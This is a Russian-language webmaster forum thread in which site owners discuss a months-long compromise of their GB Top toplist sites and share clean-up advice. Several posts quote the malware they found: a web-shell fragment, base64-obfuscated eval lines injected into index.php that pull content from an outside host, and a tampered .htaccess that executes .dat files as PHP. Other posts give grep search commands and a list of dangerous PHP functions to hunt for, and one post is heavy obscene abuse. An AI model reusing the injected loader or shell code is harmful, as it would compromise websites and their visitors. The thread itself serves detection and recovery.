(Лечение!) Ахтунг атакуют топы или дыра GB Top

Как я понимаю единственным верным решением следует одно - это удаление формы webmasters.php? Нет формы для сабмита - нет взлому. Значит нужно написать скрипт который будет обрабатывать запрос и отправлять его на мыло мастера. Как предложил J_Geer:. Идея отличная только как статитику проверять трейдеры будут? Еще бы не плохо капчу конечно и еще фишки какие нибудь прикрутить.

Со статистикой пока сам не придумал... хотя кое-кто ее и не давал, видел такое... А капча в моей форме есть, попробуй, может понравится скриптик...

J_Geer: На мультинишевом как быть надо бы две формы одна для однонишевых другая для мультинишевых

Ну так для универсальности просто еще одно поле добавить - категории. Не сообразил сразу. Добавлю по наличию времени.
По поводу взлома. Сказка не закончилась. Вчера чисто случайно залез на одном из виртуалов в папку с картинками на чисто HTML'ьном сайтике вовсе без GB TOPа на домене, и обнаружил там outclick.php (22,7 кб):

Код: [развернуть]

$auth_pass = "af0209exxxxxxxxxxxxxxxxxxxxxxxxxxxxxx"; #root $color = "#df5"; $default_action = "FilesMan"; $default_charset = "Windows-1251"; preg_replace("/.*/e","\

и т.д. Пролез по остальным доменам на этом виртуале, и обнаружил, что ВСЕ индекс.php всех скриптов либо заинклужены кодом:

Код: [развернуть]

eval(base64_decode('JGZpbGUgPSBAaW1wbG9kZSgiIixmaWxlKCJodHRwOi8vY3J2LmNjL2NjP2M9Ii4kX1NFUlZFUlsnUkVNT1RFX0FERFInXSkpOyBlY2hvICRmaWxlOw=='));

или

Код: [развернуть]

eval(base64_decode('JGNoID0gY3VybF9pbml0ICgpOwpjdXJsX3NldG9wdCAoJGNoICwgQ1VSTE9QVF9VUkwgLCAiaHR0cDovL2Nydi5jYy9jYy8/Yz0iLiRfU0VSVkVSWydSRU1PVEVfQUREUiddKTsKY3VybF9zZXRvcHQgKCRjaCAsIENVUkxPUFRfUkVUVVJOVFJBTlNGRVIgLCAxICk7CiRnZXRjYyA9IGN1cmxfZXhlYygkY2gpOwpjdXJsX2Nsb3NlKCRjaCk7CmVjaG8gJGdldGNjOw=='));

, причем не обязательно в конце файла, либо подменены на кодированную хрень размером 22,7 или 36,3 кб. При этом скрипты работали. Но особенно мне не понравился тот момент, что все файлы стояли под chmod 444, а зенденые индексы FET CJ оказались дезендеными с выше указанным инклудом.Кроме того, при очередной проверке топов нашел несколько подмененных htaccess'ов (99 байт вместо 112):

Код: [развернуть]

php_flag register_globals On AddHandler application/x-httpd-php .php .htm .html .phtml .shtml .dat

в memberfiles, datafiles(его там, по-моему вообще не должно быть) и backup GB TOP'ов.
Логично предположить, что следующий трипер будет сидеть уже в любых, в т.ч. и dat файлах, не только php.

У кого дедики/вдски - попробуйте прогнать из под шелла (первый ключ - латинское эль маленькое, не латинское И большое!)
grep -l -r PathDenyFilter *
grep -l -r auth_pass *
grep -l -r ftpaccess *
grep -l -r '$default_action = "FilesMan"' *
grep -l -r 'php_flag register_globals On' *
grep -l -r 'AddHandler application/x-httpd-php' *
, и просмотрите содержимое выданных файлов. Если что-то отыщете типа выше приведенного, погоняйте еще по разным кускам своего кода.

На всякий случай: grep работает "сверху вниз", т.е. при старте из /home ищется во всех апаках ниже ее и в ней самой, если стартуете из / - ищется во всех файлах.

Я вчера проверил еще как. В общем абсолютно все index.php изменены. Размер новых был в районе 20кб хотя должен быть 14кб. Нашел и бэкдор в абсолютно а другом домене не относящихся к топам. Ищите да найдете!

З.Ы. Кстати за все время переполоха ни кто не предложил перейти на DF Lite

Сделал PHP скрипт для поиска по серверу - для тех, у кого виртуалы без SSH. Кому надо - кину в личку.
Тоже нашел триппер в абсолютно не относящихся к топам доменах.

Мэн мне скинь тоже

Уже воспользовался твоим скриптом. Коненчо муторно добавлять трейдеров, но зато безопасно. Что хотелось бы внести по этому поводу:

Упорядочить как в админке на добавление, те:
domain
url
Banner
category
Title
Desc
Mail
И подобное...
И коненчо возможность вносить ниши. По идее рулесы не нужны. Количесвто символов лучше не ограничивать конкретно в майле ,баннерах и урлах. А вот проверку на допустимость симолов лучше сделать, чтобы не сабмитили скажем там %^&*+" и прочее

Сука! Гандон! Пидор! Опять! Бляяяять! Как? Только вчера все вычистил сука, все пароли поменял.. Урод чтоб у тебя хуй отсох! Бля гад отъебись по человечески прошу!

CrazyMen писал:

Кстати за все время переполоха ни кто не предложил перейти на DF Lite

Lite не поддерживает, кроме всего прочего, безресетники, которые у большинства на гб. Кстати, если кто-то вдруг решит перейти на дф, могу поделиться готовым решением, значительно облегчающим переход (как-то преходилось переносить базы с гб).

Zeus: Спасибо! Если что будем знать!

Последний раз редактировалось: CrazyMen (04/02/11 в 07:22), всего редактировалось 1 раз

мало того ин по ауту у него нету следовательно накрутить элементарно. или уже умеет?

CrazyMen: кинул в личку...

J_Geer: В про версии вроде считает все.

CrazyMen писал:

Уже воспользовался твоим скриптом. Коненчо муторно добавлять трейдеров, но зато безопасно.

Бесполезно это всё
Шелл сидит на сервере и прятать форму добавления бессмысленно.

J_Geer писал:

У кого дедики/вдски - попробуйте прогнать из под шелла (первый ключ - латинское эль маленькое, не латинское И большое!)

Ещё нужно искать:
eval
base64_decode
unpack
system
exec
passthru
shell_exec
popen
...

и ещё куча вариантов, в т.ч. и закрытые енкодерами скрипты, которые вообще не поймаешь

Те кого постоянно ломают попробуйте топы поднять на новом хосте (базу только перенесите), и через свою форму сабмиты принимайте. А то не понимаю вашей тяги постоянно чинить и чистить. Если уже третий месяц все ломают нужно уже что то делать. Я вот заметил уже у некоторых пока сабмит форма закрыта. Надеюсь временно, пока все чин чинарем не заработает.

Проблема уже не в топах... Все это дерьмо рассеивается по всему серверу независимо от скрипта. И индексы подменялись в любых скриптах. Где-то сидит зараза, чистки и смена паролей на помогают. Причем зараза влегкую всовывает файлы в папки с чмодом 555 и влезает в файлы с чмодом 444.

Последний раз редактировалось: J_Geer (04/02/11 в 12:01), всего редактировалось 1 раз

ну вот я и говорю поднимите все на другом сервере. А то 3 месяца заниматься чистками это вредно для нервной системы.

Хорошее решение )) - поднять 60+ сайтов на другом сервере, тем паче что у меня виртуалы на год почти проплачены... И не факт, что триппер не перетащишь...

CrazyMen писал:

вчера все вычистил сука, все пароли поменял.. Урод чтоб у тебя хуй отсох! Бля гад отъебись по человечески прошу!

CrazyMen Попробуй действительно перенести хотя бы часть хозяйства на новый сервак! Вот я заметил такую особенность, У меня есть топы скрипта ГБ версии когда еще можно было взломать, так эти топы периодически статистику перекасаебывает, учитывая что скрипт обновлял, а есть топы которые сразу ставил новую версию скрипта, не сырую, делал restore, так с такими топами пока все в порядке, если не хочешь переезжать, удаляй все и настраивай все по новой! А лучшего всего установить скрипт и все ручками забить! П.С. честно тож надоели эти последствия..... ;)

J_Geer: Ну 60 сайтов это не так уж и много, хотя смотря какие сайты там кроме ГБшных топов висят. Лучше уж недельку потратить на перетаскивание, чем 3 месяца на чистки и зачистки и трату нервов. А когда все перетащишь с виртуалов, то попросишь чтобы резетнули тебе они их и можешь там еще сетку топов поднять.

Ох мля и заепся... Конечно перезд на другой сервер дело относительно не сложное, но! При переезде смениться айпи что отразится на СЕО. Возможна потеря информации. Сиджи сдохнут. Может лучше поставить DF Lite, а со временем перейти на Pro? А может действительно скинутся и выпустить самописный?

_4eburek: в соем случае это реально много, т.к. топов там с десяток, а остальное FET'ы, протоны как топовые фрихи, сплоги на разных скриптах, просто фрихи завязанные на сутру, несколько белых сайтов на разных скриптах и туева хуча галер... так что это вовсе не неделька получится...

CrazyMen писал:

А может действительно скинутся и выпустить самописный?

Ну так чисто топы прекрасно живут и на TE, протоновских клонах, FetCJ...

J_Geer: Это как? Там же нет учета статистики за 7 дней?